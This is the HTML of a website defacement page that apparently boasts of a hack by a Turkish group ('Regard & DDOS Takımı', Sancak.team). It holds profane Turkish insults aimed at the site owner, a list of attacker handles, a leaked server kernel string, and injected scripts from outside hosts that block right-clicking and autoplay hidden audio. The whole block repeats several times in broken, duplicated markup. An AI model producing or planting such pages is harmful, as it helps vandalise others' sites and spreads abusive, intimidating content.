We came to fucking you <s>Lamer</s><br><br><font size="4"><strong> Biri bizi sustursunnn @tabi yersee :] - Su capulcu sitene basmak istemezdim fakat bastirtmak icin can atiyorsun kalitesini siktigim putperest abaza leymir seni<br><br> Icraat Sanati Vol ??<br><br>Operative System: Linux<br>Linux srv38.main-hosting.eu 3.2.55-grsec #2 SMP Fri Mar 28 18:25:48 EDT 2014 x86_64</strong></font></font></font></font></p><br>
</br></center>
<center><font face="Courier New" color="black" face="Courier New" size="4"><font face="Courier New" color="red">[</font><strong> > CondoR ~ SiNeKBeY ~ W3R4S3L ~ PoYrAz7221 ~ Slowycan ~ Regard And Moree...  < </strong><font color="red">]</font></font></font></p></center>
<hr align="center" color="black" size="3" width="20%"><font face="Courier New" style="color: rgb(0, 0, 0); text-shadow: rgb(0, 0, 0) 0px 1px 7px;" color="black" face="Courier New" size="4"><font color="black" face="Share Tech Mono" size="4"><br>

<span style="padding:5px;border: 1px solid black;background: #f12;color: white;font-family: courier new;text-shadow: rgb(255, 255, 255) 1px 0px 8px;"><a href="http://twitter.com/WMCondoR" target="_blank" style="color: #fff;text-decoration: none;cursor: auto;"> Twitter.Com / CondoR </a></span><br><br>
<br>

Sancak.team //DDOS Takımı//Uyarıldiniz !

 
<html>
<head>
<meta charset="utf-8">
<title>Defaced by RegarD & DDOS Takımı</title>
</head>
<body bgcolor="white">
<style>a:link,a:visited{text-decoration:none;cursor:url(http://condorizmw.esy.es/lnk.cur),default;}a:hover,a:active{cursor:url(http://condorizmw.esy.es/lnk.cur),default;}body{cursor:url(http://condorizmw.esy.es/normal.cur),default;}</style>
<script language="javascript" data-rocketsrc="http://condorizmw.esy.es/engel.js" type="text/rocketscript"></script>
<script language="javascript" data-rocketsrc="http://is.sitekodlari.com/sagtusengelleme1.js" type="text/rocketscript"></script>
<img src="" align="right">
<img src="http://www.kralalemi.com/images/sol_bayrak.gif" align="left">
<iframe width="0" height="0" src="https://www.youtube.com/embed/IGlBN9p9dYw?autoplay=1" frameborder="0" allowfullscreen></iframe>
<center><img src="https://media.giphy.com/media/MfIGtdhq6Q9aM/giphy.gif" style="margin-top: -120px;"></center>
<center><h1><center><font color="black" face="Courier New">0wn3d by Regard & DDOS TAKIMI FORCE ~ Sancaktim.com</font></center></h1>
<center><font color="black" face="Courier New" size="7"><font face="Courier New" color="black">[</font><font color="red" face="Courier New" size="7">Devirdik</font><font color="black" face="Courier New" size="7"> Gidiyoruz</font><font color="black">]<br><br>
We came to fucking you <s>Lamer</s><br><br><font size="4"><strong> Biri bizi sustursunnn @tabi yersee :] - Su capulcu sitene basmak istemezdim fakat bastirtmak icin can atiyorsun kalitesini siktigim putperest abaza leymir seni<br><br> Icraat Sanati Vol ??<br><br>Operative System: Linux<br>Linux srv38.main-hosting.eu 3.2.55-grsec #2 SMP Fri Mar 28 18:25:48 EDT 2014 x86_64</strong></font></font></font></font></p><br>
</br></center>
<center><font face="Courier New" color="black" face="Courier New" size="4"><font face="Courier New" color="red">[</font><strong> > CondoR ~ SiNeKBeY ~ W3R4S3L ~ PoYrAz7221 ~ Slowycan ~ Regard And Moree...  < </strong><font color="red">]</font></font></font></p></center>
<hr align="center" color="black" size="3" width="20%"><font face="Courier New" style="color: rgb(0, 0, 0); text-shadow: rgb(0, 0, 0) 0px 1px 7px;" color="black" face="Courier New" size="4"><font color="black" face="Share Tech Mono" size="4"><br>

<span style="padding:5px;border: 1px solid black;background: #f12;color: white;font-family: courier new;text-shadow: rgb(255, 255, 255) 1px 0px 8px;"><a href="http://twitter.com/WMCondoR" target="_blank" style="color: #fff;text-decoration: none;cursor: auto;"> Twitter.Com / CondoR </a></span><br><br>
<br>

Sancak.team //DDOS Takımı//Uyarıldiniz !

 
<html>
<head>
<meta charset="utf-8">
<title>Defaced by RegarD & DDOS Takımı</title>
</head>
<body bgcolor="white">
<style>a:link,a:visited{text-decoration:none;cursor:url(http://condorizmw.esy.es/lnk.cur),default;}a:hover,a:active{cursor:url(http://condorizmw.esy.es/lnk.cur),default;}body{cursor:url(http://condorizmw.esy.es/normal.cur),default;}</style>
<script language="javascript" data-rocketsrc="http://condorizmw.esy.es/engel.js" type="text/rocketscript"></script>
<script language="javascript" data-rocketsrc="http://is.sitekodlari.com/sagtusengelleme1.js" type="text/rocketscript"></script>
<img src="" align="right">
<img src="http://www.kralalemi.com/images/sol_bayrak.gif" align="left">
<iframe width="0" height="0" src="https://www.youtube.com/embed/IGlBN9p9dYw?autoplay=1" frameborder="0" allowfullscreen></iframe>
<center><img src="https://media.giphy.com/media/MfIGtdhq6Q9aM/giphy.gif" style="margin-top: -120px;"></center>
<center><h1><center><font color="black" face="Courier New">0wn3d by Regard & DDOS TAKIMI FORCE ~ Sancaktim.com</font></center></h1>
<center><font color="black" face="Courier New" size="7"><font face="Courier New" color="black">[</font><font color="red" face="Courier New" size="7">Devirdik</font><font color="black" face="Courier New" size="7"> Gidiyoruz</font><font color="black">]<br><br>
We came to fucking you <s>Lamer</s><br><br><font size="4"><strong> Biri bizi sustursunnn @tabi yersee :] - Su capulcu sitene basmak istemezdim fakat bastirtmak icin can atiyorsun kalitesini siktigim putperest abaza leymir seni<br><br> Icraat Sanati Vol ??<br><br>Operative System: Linux<br>Linux srv38.main-hosting.eu 3.2.55-grsec #2 SMP Fri Mar 28 18:25:48 EDT 2014 x86_64</strong></font></font></font></font></p><br>
</br></center>
<center><font face="Courier New" color="black" face="Courier New" size="4"><font face="Courier New" color="red">[</font><strong> > CondoR ~ SiNeKBeY ~ W3R4S3L ~ PoYrAz7221 ~ Slowycan ~ Regard And Moree...  < </strong><font color="red">]</font></font></font></p></center>
<hr align="center" color="black" size="3" width="20%"><font face="Courier New" style="color: rgb(0, 0, 0); text-shadow: rgb(0, 0, 0) 0px 1px 7px;" color="black" face="Courier New" size="4"><font color="black" face="Share Tech Mono" size="4"><br>

<span style="padding:5px;border: 1px solid black;background: #f12;color: white;font-family: courier new;text-shadow: rgb(255, 255, 255) 1px 0px 8px;"><a href="http://twitter.com/WMCondoR" target="_blank" style="color: #fff;text-decoration: none;cursor: auto;"> Twitter.Com / CondoR </a></span><br><br>
<br>